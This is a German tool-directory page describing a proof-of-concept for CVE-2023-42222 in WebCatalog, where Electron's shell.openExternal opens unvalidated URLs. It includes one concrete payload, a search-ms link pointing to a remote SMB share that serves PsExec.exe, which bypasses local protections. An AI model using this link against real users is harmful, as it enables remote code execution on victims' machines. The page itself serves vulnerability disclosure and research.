Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-42222 — Proof-of-concept-Exploit für CVE-2023-42222 in WebCatalog, der die Ausführung beliebiger URLs über Electron's shell.openExternal demonstriert, um Sicherheitsvorkehrungen zu umgehen und Code auszuführen. | Kitploit
Tools/GitHubGitHub/itssixtyn3in/cve-2023-42222
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubitssixtyn3in/cve-2023-42222

CVE-2023-42222

Proof-of-concept-Exploit für CVE-2023-42222 in WebCatalog, der die Ausführung beliebiger URLs über Electron's shell.openExternal demonstriert, um Sicherheitsvorkehrungen zu umgehen und Code auszuführen.

Repository anzeigen
312vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-42222

Zusammenfassung der Schwachstelle

WebCatalog vor Version 48.4.0 ruft in bestimmten Fällen die Electron-Funktion shell.openExternal auf, ohne zu überprüfen, ob die URL eine http- oder https-Ressource ist. Diese Schwachstelle ermöglicht es einem Angreifer, Code auf dem Rechner des Opfers auszuführen, indem er Nachrichten mit Links versendet, die beliebige Protokolle enthalten. Das Opfer muss mit dem Link interagieren und sieht die geöffnete URL.

Ausgabe des Schwachstellenscans

SAST

PoC-Übersicht

PoC

PoC-Informationen

Die Schwachstelle kann bestätigt werden, indem eine Seite synchronisiert wird, die beliebige URLs erlaubt. Wenn eine Website synchronisiert wird, die search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools enthält, wird eine externe SMB-Verbindung hergestellt. Diese kann dann verwendet werden, um Sicherheitsvorkehrungen auf dem lokalen Rechner zu umgehen und dem Benutzer schädliche Dateien zu präsentieren, die normalerweise blockiert würden.

Tool herunterladen